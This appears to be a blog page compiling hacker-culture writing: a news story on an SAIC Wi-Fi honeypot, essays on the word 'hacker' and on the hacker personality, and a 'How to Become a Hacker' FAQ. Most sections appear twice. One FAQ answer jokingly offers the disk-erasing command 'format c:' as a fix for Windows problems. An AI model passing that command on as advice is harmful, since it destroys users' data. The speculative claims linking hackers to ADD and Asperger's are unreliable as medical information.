Learn.... Share.... Repeat....
Wi-Fi Honeypots a New Hacker Trap
Wi-Fi Honeypots a New Hacker Trap:
"War drivers beware, the next wireless network you tap might be part of an elaborate sting."
Hackers searching for wireless access points in the nation's capital may soon war drive right into a trap.
Last month researchers at the government contractor Science Applications International Corporation (SAIC) launched what might be the first organized wireless honeypot, designed to tempt unwary Wi-Fi hackers and bandwidth borrowers and gather data on their techniques and tools of choice.That the average wireless network is horribly insecure is common knowledge today; surveys of populous metropolitan areas consistently turn up hundreds or thousands of 802.11b access points inadvertently left unprotected from unauthorized use or eavesdropping by anyone within range.
(This in addition to many that are deliberately open to the public, either commercially or by the generosity of their owners). But while conventional wisdom holds that hackers are enjoying a golden era of untraceable ingress into corporate networks across the country, nobody claims to know exactly how prevalent wireless hacking really has become.That's where the Wireless Information Security Experiment, or WISE, comes in. Headed by former Air Force computer security investigator Rob Lee, now an SAIC chief of information security operations, WISE hinges on an 802.11b network based at a secret location in Washington D.C. and dedicated to no other purpose than being hacked from nearby.The network has five Cisco access points, a handful of deliberately vulnerable computers as bait, and two omni directional high-gain antennas for added reach to the nearby streets and alleys. On the back-end, a logging host gathers detailed connection data from the access points, while a passive 802.11b sniffer with a customized intrusion detection system acts as a hypersensitive trip wire. Like conventional honeypots, the WISE network has no legitimate users, so anything that crosses it is closely scrutinized.The goal, says Lee, isn't to set up D.C. hackers for prosecution, but to research the state of real life wireless hacking in a city considered by many to be a hot spot for laptop-toting cyberpunks. Lee hopes to learn who's conducting 802.11b attacks, how many hackers use wireless access to anonymize attacks on other Internet-connected systems, and what the ratio is between intruders, and those who simply drop onto nearby networks for convenient Internet access, sometimes unknowingly. Ultimately, Lee would like to be able to passively identify the various scanning tools hackers and others use to find vulnerable wireless networks.
"There may be signatures that they give off that could be incorporated into a wireless intrusion detection device looking for these active signals," says Lee.Determining Intent a Challenge The SAIC honeypot went operational on June 15th, and so far hasn't pulled in anything particularly nefarious: a single ping sweep of the bait machines, and a few people trying unsuccessfully to surf the Web. The WISE network doesn't yet have an Internet connection, but Lee plans to hook one up through a Web proxy that will intercept outgoing connection attempts and present a consent-to-monitor banner, so he can legally watch how the Internet link is used.Despite the tepid findings so far, the hacker trap is generating enthusiasm in the honeypot community, and may spawn similar projects in other cities."He's taken an idea and really run with it like hell," says Lance Spitzner, founder of the Honeynet Project. "He's gotten a lot of high-end gear so he could cover a wider area, and he's come up with a lot of really neat ideas... And he's basically operating in one of the best cities to put up a wireless honeynet."Peter Shipley, the security researcher who coined the term "war driving" over a year ago to describe the practice of cruising city streets in search of wireless networks, says he thinks wireless honeypots can produce interesting results, but that it could prove impossible to accurately differentiate between deliberate intruders and ordinary users accidentally dropping into the network. "The statistics are not going to be black and white" says Shipley. "They're going to be iffy and there's going to be a lot of speculation involved."Of course, unlike Internet-based honeypots, anyone detected on the WISE network will be located within a few blocks of the trap, perhaps parked in a car or sitting on a bus bench. Despite the opportunity, Lee says he doesn't plan to train video cameras on the street, or to physically confront hackers. But he may add other wireless technologies to the system, like 802.11a or Bluetooth, to widen the net. "Right now we're focusing on 802.11b," he says. "This might expand."
"War drivers beware, the next wireless network you tap might be part of an elaborate sting."
Hackers searching for wireless access points in the nation's capital may soon war drive right into a trap.
Last month researchers at the government contractor Science Applications International Corporation (SAIC) launched what might be the first organized wireless honeypot, designed to tempt unwary Wi-Fi hackers and bandwidth borrowers and gather data on their techniques and tools of choice.That the average wireless network is horribly insecure is common knowledge today; surveys of populous metropolitan areas consistently turn up hundreds or thousands of 802.11b access points inadvertently left unprotected from unauthorized use or eavesdropping by anyone within range.
(This in addition to many that are deliberately open to the public, either commercially or by the generosity of their owners). But while conventional wisdom holds that hackers are enjoying a golden era of untraceable ingress into corporate networks across the country, nobody claims to know exactly how prevalent wireless hacking really has become.That's where the Wireless Information Security Experiment, or WISE, comes in. Headed by former Air Force computer security investigator Rob Lee, now an SAIC chief of information security operations, WISE hinges on an 802.11b network based at a secret location in Washington D.C. and dedicated to no other purpose than being hacked from nearby.The network has five Cisco access points, a handful of deliberately vulnerable computers as bait, and two omni directional high-gain antennas for added reach to the nearby streets and alleys. On the back-end, a logging host gathers detailed connection data from the access points, while a passive 802.11b sniffer with a customized intrusion detection system acts as a hypersensitive trip wire. Like conventional honeypots, the WISE network has no legitimate users, so anything that crosses it is closely scrutinized.The goal, says Lee, isn't to set up D.C. hackers for prosecution, but to research the state of real life wireless hacking in a city considered by many to be a hot spot for laptop-toting cyberpunks. Lee hopes to learn who's conducting 802.11b attacks, how many hackers use wireless access to anonymize attacks on other Internet-connected systems, and what the ratio is between intruders, and those who simply drop onto nearby networks for convenient Internet access, sometimes unknowingly. Ultimately, Lee would like to be able to passively identify the various scanning tools hackers and others use to find vulnerable wireless networks.
"There may be signatures that they give off that could be incorporated into a wireless intrusion detection device looking for these active signals," says Lee.Determining Intent a Challenge The SAIC honeypot went operational on June 15th, and so far hasn't pulled in anything particularly nefarious: a single ping sweep of the bait machines, and a few people trying unsuccessfully to surf the Web. The WISE network doesn't yet have an Internet connection, but Lee plans to hook one up through a Web proxy that will intercept outgoing connection attempts and present a consent-to-monitor banner, so he can legally watch how the Internet link is used.Despite the tepid findings so far, the hacker trap is generating enthusiasm in the honeypot community, and may spawn similar projects in other cities."He's taken an idea and really run with it like hell," says Lance Spitzner, founder of the Honeynet Project. "He's gotten a lot of high-end gear so he could cover a wider area, and he's come up with a lot of really neat ideas... And he's basically operating in one of the best cities to put up a wireless honeynet."Peter Shipley, the security researcher who coined the term "war driving" over a year ago to describe the practice of cruising city streets in search of wireless networks, says he thinks wireless honeypots can produce interesting results, but that it could prove impossible to accurately differentiate between deliberate intruders and ordinary users accidentally dropping into the network. "The statistics are not going to be black and white" says Shipley. "They're going to be iffy and there's going to be a lot of speculation involved."Of course, unlike Internet-based honeypots, anyone detected on the WISE network will be located within a few blocks of the trap, perhaps parked in a car or sitting on a bus bench. Despite the opportunity, Lee says he doesn't plan to train video cameras on the street, or to physically confront hackers. But he may add other wireless technologies to the system, like 802.11a or Bluetooth, to widen the net. "Right now we're focusing on 802.11b," he says. "This might expand."
Hacker vs. cracker
Hacker vs. cracker:
"The word “hacker” gets used in a pejorative sense by journalists an awful lot. Some people think this is perfectly reasonable; others find it offensive, and recommend an alternative term for that meaning. Read on to find out why."
In mainstream press, the word “hacker” is often used to refer to a malicious security cracker. There is a classic definition of the term “hacker”, arising from its first documented uses related to information technologies at MIT, that is at odds with the way the term is usually used by journalists. The inheritors of the technical tradition of the word “hacker” as it was used at MIT sometimes take offense at the sloppy use of the term by journalists and others who are influenced by journalistic inaccuracy.
Some claim that the term has been unrecoverably corrupted, and acquired a new meaning that we should simply accept. This descriptivist approach is predicated upon the assumption that there’s no reasonable way to communicate effectively with the less technically minded without acquiescing to the nontechnical misuse of the term “hacker”. I believe it’s still useful to differentiate between hackers and security crackers, though, and that terms like “malicious security cracker” are sufficiently evocative and clear that their use actually helps make communication more effective than the common journalistic misuse of “hacker”.
I think it’s useful to differentiate especially because there are many situations where “hack”, and its conjugations, is the only effective term to describe something that has nothing to do with malicious violation of security measures or privacy. When you simply accept that “hacker” means “malicious security cracker”, you give up the ability to use the term to refer to anything else without potential confusion.
Both are distinct from people whose interest in technical matters is purely professional, with no desire to learn anything about the subject at hand other than to advance a career and make a living. Many hackers and security crackers turn their talents toward professional ends, of course, and some security crackers got where they are only through professional advancement, but one definitely need not have a professional interest to pursue the path of either a hacker or a security cracker.
A hacker, in the classic sense of the term, is someone with a strong interest in how things work, who likes to tinker and create and modify things for the enjoyment of doing so. For some, it is a compulsion, while for others it is a means to an end that may lead them to greater understanding of something else entirely. The IETF's RFC%201392:%20Internet%20Users’%20Glossary%20defines%20“hacker”%20as:A%20person%20who%20delights%20in%20having%20an%20intimate%20understanding%20of%20theinternal%20workings%20of%20a%20system,%20computers%20and%20computer%20networks%20inparticular.%20The%20term%20is%20often%20misused%20in%20a%20pejorative%20context,where%20“cracker”%20would%20be%20the%20correct%20term.%20See%20also:%20cracker.The%20Jargon%20Wiki’s%20first%20definition%20for%20
"The word “hacker” gets used in a pejorative sense by journalists an awful lot. Some people think this is perfectly reasonable; others find it offensive, and recommend an alternative term for that meaning. Read on to find out why."
In mainstream press, the word “hacker” is often used to refer to a malicious security cracker. There is a classic definition of the term “hacker”, arising from its first documented uses related to information technologies at MIT, that is at odds with the way the term is usually used by journalists. The inheritors of the technical tradition of the word “hacker” as it was used at MIT sometimes take offense at the sloppy use of the term by journalists and others who are influenced by journalistic inaccuracy.
Some claim that the term has been unrecoverably corrupted, and acquired a new meaning that we should simply accept. This descriptivist approach is predicated upon the assumption that there’s no reasonable way to communicate effectively with the less technically minded without acquiescing to the nontechnical misuse of the term “hacker”. I believe it’s still useful to differentiate between hackers and security crackers, though, and that terms like “malicious security cracker” are sufficiently evocative and clear that their use actually helps make communication more effective than the common journalistic misuse of “hacker”.
I think it’s useful to differentiate especially because there are many situations where “hack”, and its conjugations, is the only effective term to describe something that has nothing to do with malicious violation of security measures or privacy. When you simply accept that “hacker” means “malicious security cracker”, you give up the ability to use the term to refer to anything else without potential confusion.
Both are distinct from people whose interest in technical matters is purely professional, with no desire to learn anything about the subject at hand other than to advance a career and make a living. Many hackers and security crackers turn their talents toward professional ends, of course, and some security crackers got where they are only through professional advancement, but one definitely need not have a professional interest to pursue the path of either a hacker or a security cracker.
A hacker, in the classic sense of the term, is someone with a strong interest in how things work, who likes to tinker and create and modify things for the enjoyment of doing so. For some, it is a compulsion, while for others it is a means to an end that may lead them to greater understanding of something else entirely. The IETF's RFC%201392:%20Internet%20Users’%20Glossary%20defines%20“hacker”%20as:
Weaknesses of the Hacker Personality
Weaknesses of the Hacker Personality:
Hackers have relatively little ability to identify emotionally with other people. This may be because hackers generally aren't much like ‘other people’. Unsurprisingly, hackers also tend towards self-absorption, intellectual arrogance, and impatience with people and tasks perceived to be wasting their time.
As cynical as hackers sometimes wax about the amount of idiocy in the world, they tend by reflex to assume that everyone is as rational, ‘cool’, and imaginative as they consider themselves. This bias often contributes to weakness in communication skills. Hackers tend to be especially poor at confrontation and negotiation.
Another weakness of the hacker personality is a perverse tendancy to attack all problems from the most technically complicated angle, just because it may mean more interesting problems to solve, or cooler toys to play with. Hackers sometimes have trouble grokking that the bubble gum and paperclip hardware fix is actually the way to go, and that they really don't need to convince the client to buy that shiny new tool they've had your eye on for two months.
Because of their passionate embrace of (what they consider to be) the Right Thing, hackers can be unfortunately intolerant and bigoted on technical issues, in marked contrast to their general spirit of camaraderie and tolerance of alternative viewpoints otherwise. Old-time ITS partisans look down on the ever-growing hordes of Unix and Linux hackers; Unix aficionados despise VMS and Windows; and hackers who are used to conventional command-line user interfaces loudly loathe mouse-and-menu based systems such as the Macintosh. Hackers who don't indulge in Usenet consider it a huge waste of time and bandwidth; fans of old adventure games such as ADVENT and Zork consider MUDs to be glorified chat systems devoid of atmosphere or interesting puzzles; hackers who are willing to devote endless hours to Usenet or MUDs consider IRC to be a real waste of time; IRCies think MUDs might be okay if there weren't all those silly puzzles in the way. And, of course, there are the perennial holy wars — EMACS vs. vi, big-endian vs. little-endian, RISC vs. CISC, etc., etc., etc.
As in society at large, the intensity and duration of these debates is usually inversely proportional to the number of objective, factual arguments available to buttress any position.
As a result of all the above traits, many hackers have difficulty maintaining stable relationships. At worst, they can produce the classic geek: withdrawn, relationally incompetent, sexually frustrated, and desperately unhappy when not submerged in his or her craft. Fortunately, this extreme is far less common than mainstream folklore paints it — but almost all hackers will recognize something of themselves in the unflattering paragraphs above.
Hackers are often monumentally disorganized and sloppy about dealing with the physical world. Bills don't get paid on time, clutter piles up to incredible heights in homes and offices, and minor maintenance tasks get deferred indefinitely.
1994-95's fad behavioral disease was a syndrome called Attention Deficit Disorder (ADD), supposedly characterized by (among other things) a combination of short attention span with an ability to ‘hyperfocus’ imaginatively on interesting tasks. In 1998-1999 another syndrome that is said to overlap with many hacker traits entered popular awareness: Asperger's syndrome (AS). This disorder is also sometimes called ‘high-function autism’, though researchers are divided on whether AS is in fact a mild form of autism or a distinct syndrome with a different etiology. AS patients exhibit mild to severe deficits in interpreting facial and body-language cues and in modeling or empathizing with others' emotions. Though some AS patients exhibit mild retardation, others compensate for their deficits with high intelligence and analytical ability, and frequently seek out technical fields where problem-solving abilities are at a premium and people skills are relatively unimportant. Both syndromes are thought to relate to abnormalities in neurotransmitter chemistry, especially the brain's processing of serotonin.
Many hackers have noticed that mainstream culture has shown a tendency to pathologize and medicalize normal variations in personality, especially those variations that make life more complicated for authority figures and conformists. Thus, hackers aware of the issue tend to be among those questioning whether ADD and AS actually exist; and if so whether they are really ‘diseases’ rather than extremes of a normal genetic variation like having freckles or being able to taste DPT. In either case, they have a sneaking tendency to wonder if these syndromes are over-diagnosed and over-treated. After all, people in authority will always be inconvenienced by schoolchildren or workers or citizens who are prickly, intelligent individualists — thus, any social system that depends on authority relationships will tend to helpfully ostracize and therapize and drug such ‘abnormal’ people until they are properly docile and stupid and ‘well-socialized’.
So hackers tend to believe they have good reason for skepticism about clinical explanations of the hacker personality. That being said, most would also concede that some hacker traits coincide with indicators for non-hyperactive ADD and AS — the status of caffeine as a hacker beverage of choice may be connected to the fact that it bonds to the same neural receptors as Ritalin, the drug most commonly prescribed for ADD.
It is probably true that boosters of both would find a rather higher rate of clinical ADD among hackers than the supposedly mainstream-normal 3-5% (AS is rarer at 0.4-0.5%).
Hackers have relatively little ability to identify emotionally with other people. This may be because hackers generally aren't much like ‘other people’. Unsurprisingly, hackers also tend towards self-absorption, intellectual arrogance, and impatience with people and tasks perceived to be wasting their time.
As cynical as hackers sometimes wax about the amount of idiocy in the world, they tend by reflex to assume that everyone is as rational, ‘cool’, and imaginative as they consider themselves. This bias often contributes to weakness in communication skills. Hackers tend to be especially poor at confrontation and negotiation.
Another weakness of the hacker personality is a perverse tendancy to attack all problems from the most technically complicated angle, just because it may mean more interesting problems to solve, or cooler toys to play with. Hackers sometimes have trouble grokking that the bubble gum and paperclip hardware fix is actually the way to go, and that they really don't need to convince the client to buy that shiny new tool they've had your eye on for two months.
Because of their passionate embrace of (what they consider to be) the Right Thing, hackers can be unfortunately intolerant and bigoted on technical issues, in marked contrast to their general spirit of camaraderie and tolerance of alternative viewpoints otherwise. Old-time ITS partisans look down on the ever-growing hordes of Unix and Linux hackers; Unix aficionados despise VMS and Windows; and hackers who are used to conventional command-line user interfaces loudly loathe mouse-and-menu based systems such as the Macintosh. Hackers who don't indulge in Usenet consider it a huge waste of time and bandwidth; fans of old adventure games such as ADVENT and Zork consider MUDs to be glorified chat systems devoid of atmosphere or interesting puzzles; hackers who are willing to devote endless hours to Usenet or MUDs consider IRC to be a real waste of time; IRCies think MUDs might be okay if there weren't all those silly puzzles in the way. And, of course, there are the perennial holy wars — EMACS vs. vi, big-endian vs. little-endian, RISC vs. CISC, etc., etc., etc.
As in society at large, the intensity and duration of these debates is usually inversely proportional to the number of objective, factual arguments available to buttress any position.
As a result of all the above traits, many hackers have difficulty maintaining stable relationships. At worst, they can produce the classic geek: withdrawn, relationally incompetent, sexually frustrated, and desperately unhappy when not submerged in his or her craft. Fortunately, this extreme is far less common than mainstream folklore paints it — but almost all hackers will recognize something of themselves in the unflattering paragraphs above.
Hackers are often monumentally disorganized and sloppy about dealing with the physical world. Bills don't get paid on time, clutter piles up to incredible heights in homes and offices, and minor maintenance tasks get deferred indefinitely.
1994-95's fad behavioral disease was a syndrome called Attention Deficit Disorder (ADD), supposedly characterized by (among other things) a combination of short attention span with an ability to ‘hyperfocus’ imaginatively on interesting tasks. In 1998-1999 another syndrome that is said to overlap with many hacker traits entered popular awareness: Asperger's syndrome (AS). This disorder is also sometimes called ‘high-function autism’, though researchers are divided on whether AS is in fact a mild form of autism or a distinct syndrome with a different etiology. AS patients exhibit mild to severe deficits in interpreting facial and body-language cues and in modeling or empathizing with others' emotions. Though some AS patients exhibit mild retardation, others compensate for their deficits with high intelligence and analytical ability, and frequently seek out technical fields where problem-solving abilities are at a premium and people skills are relatively unimportant. Both syndromes are thought to relate to abnormalities in neurotransmitter chemistry, especially the brain's processing of serotonin.
Many hackers have noticed that mainstream culture has shown a tendency to pathologize and medicalize normal variations in personality, especially those variations that make life more complicated for authority figures and conformists. Thus, hackers aware of the issue tend to be among those questioning whether ADD and AS actually exist; and if so whether they are really ‘diseases’ rather than extremes of a normal genetic variation like having freckles or being able to taste DPT. In either case, they have a sneaking tendency to wonder if these syndromes are over-diagnosed and over-treated. After all, people in authority will always be inconvenienced by schoolchildren or workers or citizens who are prickly, intelligent individualists — thus, any social system that depends on authority relationships will tend to helpfully ostracize and therapize and drug such ‘abnormal’ people until they are properly docile and stupid and ‘well-socialized’.
So hackers tend to believe they have good reason for skepticism about clinical explanations of the hacker personality. That being said, most would also concede that some hacker traits coincide with indicators for non-hyperactive ADD and AS — the status of caffeine as a hacker beverage of choice may be connected to the fact that it bonds to the same neural receptors as Ritalin, the drug most commonly prescribed for ADD.
It is probably true that boosters of both would find a rather higher rate of clinical ADD among hackers than the supposedly mainstream-normal 3-5% (AS is rarer at 0.4-0.5%).
FAQ's about a hackers
Frequently Asked Questions :
Q:How do I tell if I am already a hacker?
A:Ask yourself the following three questions:
Do you speak code, fluently?
Do you identify with the goals and values of the hacker community?
Has a well-established member of the hacker community ever called you a hacker?
If you can answer yes to all three of these questions, you are already a hacker. No two alone are sufficient.
The first test is about skills. You probably pass it if you have the minimum technical skills described earlier in this document. You blow right through it if you have had a substantial amount of code accepted by an open-source development project.
The second test is about attitude. If the five principles of the hacker mindset seemed obvious to you, more like a description of the way you already live than anything novel, you are already halfway to passing it. That's the inward half; the other, outward half is the degree to which you identify with the hacker community's long-term projects.
Here is an incomplete but indicative list of some of those projects: Does it matter to you that Linux improve and spread? Are you passionate about software freedom? Hostile to monopolies? Do you act on the belief that computers can be instruments of empowerment that make the world a richer and more humane place?
But a note of caution is in order here. The hacker community has some specific, primarily defensive political interests — two of them are defending free-speech rights and fending off "intellectual-property" power grabs that would make open source illegal. Some of those long-term projects are civil-liberties organizations like the Electronic Frontier Foundation, and the outward attitude properly includes support of them. But beyond that, most hackers view attempts to systematize the hacker attitude into an explicit political program with suspicion; we've learned, the hard way, that these attempts are divisive and distracting. If someone tries to recruit you to march on your capitol in the name of the hacker attitude, they've missed the point. The right response is probably “Shut up and show them the code.”
The third test has a tricky element of recursiveness about it. I observed in the section called “What Is a Hacker?” that being a hacker is partly a matter of belonging to a particular subculture or social network with a shared history, an inside and an outside. In the far past, hackers were a much less cohesive and self-aware group than they are today. But the importance of the social-network aspect has increased over the last thirty years as the Internet has made connections with the core of the hacker subculture easier to develop and maintain. One easy behavioral index of the change is that, in this century, we have our own T-shirts.
Sociologists, who study networks like those of the hacker culture under the general rubric of "invisible colleges", have noted that one characteristic of such networks is that they have gatekeepers — core members with the social authority to endorse new members into the network. Because the "invisible college" that is hacker culture is a loose and informal one, the role of gatekeeper is informal too. But one thing that all hackers understand in their bones is that not every hacker is a gatekeeper. Gatekeepers have to have a certain degree of seniority and accomplishment before they can bestow the title. How much is hard to quantify, but every hacker knows it when they see it.
Q:Will you teach me how to hack?
A:Since first publishing this page, I've gotten several requests a week (often several a day) from people to "teach me all about hacking". Unfortunately, I don't have the time or energy to do this; my own hacking projects, and working as an open-source advocate, take up 110% of my time.
Even if I did, hacking is an attitude and skill you basically have to teach yourself. You'll find that while real hackers want to help you, they won't respect you if you beg to be spoon-fed everything they know.
Learn a few things first. Show that you're trying, that you're capable of learning on your own. Then go to the hackers you meet with specific questions.
If you do email a hacker asking for advice, here are two things to know up front. First, we've found that people who are lazy or careless in their writing are usually too lazy and careless in their thinking to make good hackers — so take care to spell correctly, and use good grammar and punctuation, otherwise you'll probably be ignored. Secondly, don't dare ask for a reply to an ISP account that's different from the account you're sending from; we find people who do that are usually thieves using stolen accounts, and we have no interest in rewarding or assisting thievery.
Q:How can I get started, then?
A:The best way for you to get started would probably be to go to a LUG (Linux user group) meeting. You can find such groups on the LDP General Linux Information Page; there is probably one near you, possibly associated with a college or university. LUG members will probably give you a Linux if you ask, and will certainly help you install one and get started.
Q:When do you have to start? Is it too late for me to learn?
A:Any age at which you are motivated to start is a good age. Most people seem to get interested between ages 15 and 20, but I know of exceptions in both directions.
Q:How long will it take me to learn to hack?
A:That depends on how talented you are and how hard you work at it. Most people who try can acquire a respectable skill set in eighteen months to two years, if they concentrate. Don't think it ends there, though; in hacking (as in many other fields) it takes about ten years to achieve mastery. And if you are a real hacker, you will spend the rest of your life learning and perfecting your craft.
Q:Is Visual Basic a good language to start with?
A:If you're asking this question, it almost certainly means you're thinking about trying to hack under Microsoft Windows. This is a bad idea in itself. When I compared trying to learn to hack under Windows to trying to learn to dance while wearing a body cast, I wasn't kidding. Don't go there. It's ugly, and it never stops being ugly.
There is a specific problem with Visual Basic; mainly that it's not portable. Though there is a prototype open-source implementations of Visual Basic, the applicable ECMA standards don't cover more than a small set of its programming interfaces. On Windows most of its library support is proprietary to a single vendor (Microsoft); if you aren't extremely careful about which features you use — more careful than any newbie is really capable of being — you'll end up locked into only those platforms Microsoft chooses to support. If you're starting on a Unix, much better languages with better libraries are available. Python, for example.
Also, like other Basics, Visual Basic is a poorly-designed language that will teach you bad programming habits. No, don't ask me to describe them in detail; that explanation would fill a book. Learn a well-designed language instead.
One of those bad habits is becoming dependent on a single vendor's libraries, widgets, and development tools. In general, any language that isn't fully supported under at least Linux or one of the BSDs, and/or at least three different vendors' operating systems, is a poor one to learn to hack in.
Q:Would you help me to crack a system, or teach me how to crack?
A:No. Anyone who can still ask such a question after reading this FAQ is too stupid to be educable even if I had the time for tutoring. Any emailed requests of this kind that I get will be ignored or answered with extreme rudeness.
Q:How can I get the password for someone else's account?
A:This is cracking. Go away, idiot.
Q:How can I break into/read/monitor someone else's email?
A:This is cracking. Get lost, moron.
Q:How can I steal channel op privileges on IRC?
A:This is cracking. Begone, cretin.
Q:I've been cracked. Will you help me fend off further attacks?
A:No. Every time I've been asked this question so far, it's been from some poor sap running Microsoft Windows. It is not possible to effectively secure Windows systems against crack attacks; the code and architecture simply have too many flaws, which makes securing Windows like trying to bail out a boat with a sieve. The only reliable prevention starts with switching to Linux or some other operating system that is designed to at least be capable of security.
Q:I'm having problems with my Windows software. Will you help me?
A:Yes. Go to a DOS prompt and type "format c:". Any problems you are experiencing will cease within a few minutes.
Q:here can I find some real hackers to talk with?
A:The best way is to find a Unix or Linux user's group local to you and go to their meetings (you can find links to several lists of user groups on the LDP site at ibiblio).
(I used to say here that you wouldn't find any real hackers on IRC, but I'm given to understand this is changing. Apparently some real hacker communities, attached to things like GIMP and Perl, have IRC channels now.)
Q:Can you recommend useful books about hacking-related subjects?
A:I maintain a Linux Reading List HOWTO that you may find helpful. The Loginataka may also be interesting.
For an introduction to Python, see the introductory materials on the Python site.
Q:Do I need to be good at math to become a hacker?
A:No. Hacking uses very little formal mathematics or arithmetic. In particular, you won't usually need trigonometry, calculus or analysis (there are exceptions to this in a handful of specific application areas like 3-D computer graphics). Knowing some formal logic and Boolean algebra is good. Some grounding in finite mathematics (including finite-set theory, combinatorics, and graph theory) can be helpful.
Much more importantly: you need to be able to think logically and follow chains of exact reasoning, the way mathematicians do. While the content of most mathematics won't help you, you will need the discipline and intelligence to handle mathematics. If you lack the intelligence, there is little hope for you as a hacker; if you lack the discipline, you'd better grow it.
I think a good way to find out if you have what it takes is to pick up a copy of Raymond Smullyan's book What Is The Name Of This Book?. Smullyan's playful logical conundrums are very much in the hacker spirit. Being able to solve them is a good sign; enjoying solving them is an even better one.
Q:What language should I learn first?
A:XHTML (the latest dialect of HTML) if you don't already know it. There are a lot of glossy, hype-intensive bad HTML books out there, and distressingly few good ones. The one I like best is HTML: The Definitive Guide.
But HTML is not a full programming language. When you're ready to start programming, I would recommend starting with Python. You will hear a lot of people recommending Perl, and Perl is still more popular than Python, but it's harder to learn and (in my opinion) less well designed.
C is really important, but it's also much more difficult than either Python or Perl. Don't try to learn it first.
Windows users, do not settle for Visual Basic. It will teach you bad habits, and it's not portable off Windows. Avoid.
Q:What kind of hardware do I need?
A:It used to be that personal computers were rather underpowered and memory-poor, enough so that they placed artificial limits on a hacker's learning process. This stopped being true in the mid-1990s; any machine from an Intel 486DX50 up is more than powerful enough for development work, X, and Internet communications, and the smallest disks you can buy today are plenty big enough.
The important thing in choosing a machine on which to learn is whether its hardware is Linux-compatible (or BSD-compatible, should you choose to go that route). Again, this will be true for almost all modern machines. The only really sticky areas are modems and wireless cards; some machines have Windows-specific hardware that won't work with Linux.
There's a FAQ on hardware compatibility; the latest version is here.
Q:I want to contribute. Can you help me pick a problem to work on?
A:No, because I don't know your talents or interests. You have to be self-motivated or you won't stick, which is why having other people choose your direction almost never works.
Try this. Watch the project announcements scroll by on Freshmeat for a few days. When you see one that makes you think "Cool! I'd like to work on that!", join it.
Q:Do I need to hate and bash Microsoft?
A:No, you don't. Not that Microsoft isn't loathsome, but there was a hacker culture long before Microsoft and there will still be one long after Microsoft is history. Any energy you spend hating Microsoft would be better spent on loving your craft. Write good code — that will bash Microsoft quite sufficiently without polluting your karma.
Q:But won't open-source software leave programmers unable to make a living?
A:This seems unlikely — so far, the open-source software industry seems to be creating jobs rather than taking them away. If having a program written is a net economic gain over not having it written, a programmer will get paid whether or not the program is going to be open-source after it's done. And, no matter how much "free" software gets written, there always seems to be more demand for new and customized applications. I've written more about this at the Open Source pages.
Q:Where can I get a free Unix?
A:If you don't have a Unix installed on your machine yet, elsewhere on this page I include pointers to where to get the most commonly used free Unix. To be a hacker you need motivation and initiative and the ability to educate yourself. Start now...
Other Resources
Other Resources:
Paul Graham has written an essay called Great Hackers, and another on Undergraduation, in which he speaks much wisdom.
There is a document called How To Be A Programmer that is an excellent complement to this one. It has valuable advice not just about coding and skillsets, but about how to function on a programming team.
I have also written A Brief History Of Hackerdom.
I have written a paper, The Cathedral and the Bazaar, which explains a lot about how the Linux and open-source cultures work. I have addressed this topic even more directly in its sequel Homesteading the Noosphere.
Rick Moen has written an excellent document on how to run a Linux user group.
Rick Moen and I have collaborated on another document on How To Ask Smart Questions. This will help you seek assistance in a way that makes it more likely that you will actually get it.
If you need instruction in the basics of how personal computers, Unix, and the Internet work, see The Unix and Internet Fundamentals HOWTO.
When you release software or write patches for software, try to follow the guidelines in the Software Release Practice HOWTO.
If you enjoyed the Zen poem, you might also like Rootless Root: The Unix Koans of Master Foo.
Paul Graham has written an essay called Great Hackers, and another on Undergraduation, in which he speaks much wisdom.
There is a document called How To Be A Programmer that is an excellent complement to this one. It has valuable advice not just about coding and skillsets, but about how to function on a programming team.
I have also written A Brief History Of Hackerdom.
I have written a paper, The Cathedral and the Bazaar, which explains a lot about how the Linux and open-source cultures work. I have addressed this topic even more directly in its sequel Homesteading the Noosphere.
Rick Moen has written an excellent document on how to run a Linux user group.
Rick Moen and I have collaborated on another document on How To Ask Smart Questions. This will help you seek assistance in a way that makes it more likely that you will actually get it.
If you need instruction in the basics of how personal computers, Unix, and the Internet work, see The Unix and Internet Fundamentals HOWTO.
When you release software or write patches for software, try to follow the guidelines in the Software Release Practice HOWTO.
If you enjoyed the Zen poem, you might also like Rootless Root: The Unix Koans of Master Foo.
Points For Style
Points For Style:
Again, to be a hacker, you have to enter the hacker mindset. There are some things you can do when you're not at a computer that seem to help. They're not substitutes for hacking (nothing is) but many hackers do them, and feel that they connect in some basic way with the essence of hacking.
Learn to write your native language well. Though it's a common stereotype that programmers can't write, a surprising number of hackers (including all the most accomplished ones I know of) are very able writers.
Read science fiction. Go to science fiction conventions (a good way to meet hackers and proto-hackers).
Train in a martial-arts form. The kind of mental discipline required for martial arts seems to be similar in important ways to what hackers do. The most popular forms among hackers are definitely Asian empty-hand arts such as Tae Kwon Do, various forms of Karate, Kung Fu, Aikido, or Ju Jitsu. Western fencing and Asian sword arts also have visible followings. In places where it's legal, pistol shooting has been rising in popularity since the late 1990s. The most hackerly martial arts are those which emphasize mental discipline, relaxed awareness, and control, rather than raw strength, athleticism, or physical toughness.
Study an actual meditation discipline. The perennial favorite among hackers is Zen (importantly, it is possible to benefit from Zen without acquiring a religion or discarding one you already have). Other styles may work as well, but be careful to choose one that doesn't require you to believe crazy things.
Develop an analytical ear for music. Learn to appreciate peculiar kinds of music. Learn to play some musical instrument well, or how to sing.
Develop your appreciation of puns and wordplay.
The more of these things you already do, the more likely it is that you are natural hacker material. Why these things in particular is not completely clear, but they're connected with a mix of left- and right-brain skills that seems to be important; hackers need to be able to both reason logically and step outside the apparent logic of a problem at a moment's notice.
Work as intensely as you play and play as intensely as you work. For true hackers, the boundaries between "play", "work", "science" and "art" all tend to disappear, or to merge into a high-level creative playfulness. Also, don't be content with a narrow range of skills. Though most hackers self-describe as programmers, they are very likely to be more than competent in several related skills — system administration, web design, and PC hardware troubleshooting are common ones. A hacker who's a system administrator, on the other hand, is likely to be quite skilled at script programming and web design. Hackers don't do things by halves; if they invest in a skill at all, they tend to get very good at it.
Finally, a few things not to do.
Don't use a silly, grandiose user ID or screen name.
Don't get in flame wars on Usenet (or anywhere else).
Don't call yourself a ‘cyberpunk’, and don't waste your time on anybody who does.
Don't post or email writing that's full of spelling errors and bad grammar.
The only reputation you'll make doing any of these things is as a twit. Hackers have long memories — it could take you years to live your early blunders down enough to be accepted.
The problem with screen names or handles deserves some amplification. Concealing your identity behind a handle is a juvenile and silly behavior characteristic of crackers, warez d00dz, and other lower life forms.
Hackers don't do this; they're proud of what they do and want it associated with their real names. So if you have a handle, drop it. In the hacker culture it will only mark you as a loser.
Again, to be a hacker, you have to enter the hacker mindset. There are some things you can do when you're not at a computer that seem to help. They're not substitutes for hacking (nothing is) but many hackers do them, and feel that they connect in some basic way with the essence of hacking.
